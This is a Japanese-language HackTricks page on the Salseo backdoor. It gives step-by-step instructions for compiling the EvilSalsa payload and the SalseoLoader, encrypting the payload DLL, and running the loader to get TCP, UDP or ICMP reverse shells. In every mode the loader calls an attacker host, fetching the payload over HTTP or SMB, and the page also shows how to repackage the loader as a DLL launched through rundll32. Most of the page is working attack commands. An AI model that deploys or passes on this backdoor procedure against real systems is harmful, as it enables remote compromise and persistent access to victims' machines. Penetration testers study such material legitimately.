hacktricks/backdoors/salseo.md

9 KiB
Raw Blame History

Salseo

ゼロからヒーローまでAWSハッキングを学ぶ htARTEHackTricks AWS Red Team Expert

HackTricksをサポートする他の方法

バイナリのコンパイル

GitHubからソースコードをダウンロードし、EvilSalsaSalseoLoaderをコンパイルします。コードをコンパイルするにはVisual Studioが必要です。

これらのプロジェクトを、使用するWindowsボックスのアーキテクチャ用にコンパイルしますWindowsがx64をサポートしている場合は、そのアーキテクチャ用にコンパイルします

Visual Studio内で、左側の"Build"タブ内の**"Platform Target"**でアーキテクチャを選択できます。

**このオプションが見つからない場合は、**"Project Tab"をクリックして、次に" Properties"**をクリックします)

次に、両方のプロジェクトをビルドしますBuild -> Build Solutionログ内に実行可能ファイルのパスが表示されます

バックドアの準備

まず、EvilSalsa.dllをエンコードする必要があります。これを行うには、Pythonスクリプトencrypterassembly.pyを使用するか、プロジェクトEncrypterAssemblyをコンパイルできます:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

ウィンドウズ

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

バックドアの実行

TCPリバースシェルの取得HTTPを介してエンコードされたdllをダウンロードする

リバースシェルリスナーとHTTPサーバーを起動して、エンコードされたEvilDalsa.dllを提供することを忘れないでください。

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

UDPリバースシェルを取得するSMBを介してエンコードされたdllをダウンロードする

リバースシェルリスナーとしてncを起動し、エンコードされたevilsalsaを提供するためのSMBサーバーimpacket-smbserverを起動することを忘れないでください。

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

ICMPリバースシェルを取得するエンコードされたdllはすでに被害者の中にある

今回は、リバースシェルを受け取るためにクライアントに特別なツールが必要です。ダウンロード: https://github.com/inquisb/icmpsh

ICMP応答を無効にする:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

クライアントを実行する:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

被害者の内部で、salseoの操作を実行します

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

DLLエクスポートメイン関数としてSalseoLoaderをコンパイルする

Visual Studioを使用してSalseoLoaderプロジェクトを開きます。

メイン関数の前に追加: [DllExport]

このプロジェクトにDllExportをインストール

ツール --> NuGetパッケージマネージャ --> ソリューションのNuGetパッケージを管理...

DllExportパッケージを検索ブラウズタブを使用し、インストールを押してポップアップを受け入れて

プロジェクトフォルダにDllExport.batDllExport_Configure.batというファイルが表示されます

DllExportをアンインストール

アンインストールを押します(はい、奇妙ですが、信じてください、必要です)

Visual Studioを終了し、DllExport_configureを実行

Visual Studioを終了します

その後、SalseoLoaderフォルダに移動し、DllExport_Configure.batを実行します

x64を選択しますx64ボックス内で使用する場合、私の場合はそうでしたSystem.Runtime.InteropServicesDllExportのNamespace内)を選択し、Applyを押します

プロジェクトを再度Visual Studioで開く

**[DllExport]**はもはやエラーとしてマークされていません

ソリューションをビルド

Output Type = Class Libraryを選択します(プロジェクト --> SalseoLoaderのプロパティ --> アプリケーション --> Output type = Class Library

x64プラットフォームを選択します(プロジェクト --> SalseoLoaderのプロパティ --> ビルド --> Platform target = x64

ソリューションをビルドするには: Build --> Build Solution出力コンソール内に新しいDLLのパスが表示されます

生成されたDllをテスト

生成されたDllをテストしたい場所にコピーして貼り付けます。

実行:

rundll32.exe SalseoLoader.dll,main

もしエラーが表示されない場合、おそらく機能するDLLを持っています

DLLを使用してシェルを取得する

HTTPサーバーを使用してncリスナーを設定することを忘れないでください

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

CMD

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
htARTEHackTricks AWS Red Team Expert を使用して、ゼロからヒーローまでAWSハッキングを学ぶ

HackTricks をサポートする他の方法: